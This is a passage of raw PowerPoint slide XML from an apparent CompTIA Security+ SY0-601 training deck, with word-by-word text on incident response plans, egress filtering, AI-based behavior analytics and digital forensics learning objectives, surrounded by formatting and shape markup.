              </a:rPr>
              <a:t>algorithms</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>high</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>priority.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07564" y="4437888"/>
            <a:ext cx="1709927" cy="1709927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3318764" y="1933193"/>
            <a:ext cx="10021570" cy="27457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Artificial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Intelligence </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(AI)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is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used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User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Entity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Behavior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Analysis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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(UEBA).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00">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1960245" marR="443230">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Machine</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>learning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>relies</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>training</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15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5">
                <a:solidFill>
                  <a:srgbClr val="44484E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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>develop </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-565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">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>capability.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050">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2730500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>actor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>able</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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44484E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1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>samples.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02508" y="1187196"/>
            <a:ext cx="3974591" cy="36575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07916" y="784098"/>
            <a:ext cx="272605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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-195">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Takeaways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1906523"/>
            <a:ext cx="457200" cy="4572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3063239"/>
            <a:ext cx="457200" cy="4572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4668011"/>
            <a:ext cx="457200" cy="4572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85697" y="1883156"/>
            <a:ext cx="8675370" cy="4827270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Incident</a:t>
            </a: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response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policy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sets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resources,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processes,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guidelines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dealing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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>with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security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incidents.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950">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pP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An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Incident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Response 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Plan </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(IRP)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outlines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the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procedures,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contacts,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and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resources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that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responders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will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have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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access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in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event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a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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variety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incident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types.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150">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2084070">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pP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Metadata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refers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to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>property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14">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>data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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>created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by </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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application,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="3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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>media,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network.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300">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="804545">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Web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gateway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can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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>be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secured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for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>egress</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="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filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="3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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>updating </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-56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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>URL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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>or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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>the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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>data.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5910071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0960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="8333740" marR="5080" indent="-2419350">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="170"/>
              <a:t>Com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55"/>
              <a:t>TI</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65"/>
              <a:t>Security+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70"/>
              <a:t>Certificatio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114"/>
              <a:t>SY</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40"/>
              <a:t>601  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>Exam</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>Training</a:t>
            </a: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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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993898" y="4258436"/>
            <a:ext cx="6209030" cy="835660"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="60960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2261870" marR="5080" indent="-2249805">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="185"/>
              <a:t>Domai</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="195"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t>4:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="215"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="160"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120"/>
              <a:t>tion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>Incident  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125"/>
              <a:t>Response</a:t>
            </a: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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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21911" y="4258436"/>
            <a:ext cx="486600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95"/>
              <a:t>Explaining</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110"/>
              <a:t>Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75"/>
              <a:t>Forensics</a:t>
            </a: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02278" y="784098"/>
            <a:ext cx="3538854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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objectives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9692" y="1187196"/>
            <a:ext cx="4820411" cy="3657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3177539"/>
            <a:ext cx="457200" cy="4572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4299203"/>
            <a:ext cx="457200" cy="4572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5445252"/>
            <a:ext cx="457200" cy="4572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97763" y="2254757"/>
            <a:ext cx="8451850" cy="47542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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>By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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>end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this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lesson,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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>you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will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able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to:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="626110" marR="5080">
              <a:lnSpc>
                <a:spcPts val="8760"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2419350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Illustrate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	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key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aspects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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital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forensics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documentation </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>List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key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aspects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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital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forensics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évidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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acquisition</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="626110" marR="4022725">
              <a:lnSpc>
                <a:spcPts val="9010"/>
              </a:lnSpc>
            </a:pP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Elaborate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data acquisition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Analyze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order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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>volatility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6591300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26558" y="4258436"/>
            <a:ext cx="580326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10"/>
              <a:t>Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80"/>
              <a:t>Forensics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>Documentation</a:t>
            </a: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85347" y="3843528"/>
            <a:ext cx="4276725" cy="4577080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4276725" h="4577080">
                <a:moveTo>
                  <a:pt x="4001642" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="274700" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225309" y="4424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178828" y="17180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136031" y="37493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97693" y="64589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64589" y="97693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37493" y="136031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17180" y="178828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4424" y="225309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="274700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4301896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4424" y="4351270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17180" y="4397740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37493" y="4440531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64589" y="4478867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97693" y="4511972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136031" y="4539071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178828" y="4559387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225309" y="4572146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274700" y="4576572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4001642" y="4576572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4051034" y="4572146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4097515" y="4559387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4140312" y="4539071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178650" y="4511972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211754" y="4478867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238850" y="4440531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259163" y="4397740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4271919" y="4351270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4276344" y="4301896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4276344" y="274700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4271919" y="225309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259163" y="178828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238850" y="136031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211754" y="97693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178650" y="64589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4140312" y="37493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4097515" y="17180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4051034" y="4424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4001642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108191" y="3843528"/>
            <a:ext cx="4277995" cy="4577080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4277995" h="4577080">
                <a:moveTo>
                  <a:pt x="3926966" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="350900" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303284" y="3203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257615" y="12534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214312" y="27574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173792" y="47907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136473" y="73113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102774" y="102774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73113" y="136473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47907" y="173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27574" y="214312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12534" y="257615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203" y="303284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="350900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4225620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203" y="4273242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12534" y="4318917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27574" y="4362227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47907" y="4402753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73113" y="4440077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102774" y="4473781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136473" y="4503447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173792" y="4528657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214312" y="4548992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257615" y="4564035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303284" y="4573368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="350900" y="4576572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3926966" y="4576572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3974583" y="4573368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4020252" y="4564035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4063555" y="4548992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4104075" y="4528657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4141394" y="4503447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4175093" y="4473781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4204754" y="4440077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4229960" y="4402753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250293" y="4362227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4265333" y="4318917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4274664" y="4273242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4277868" y="4225620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4277868" y="350900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4274664" y="303284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4265333" y="257615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250293" y="214312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4229960" y="173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4204754" y="136473"/>
                </a:lnTo>
                <a:lnTo>
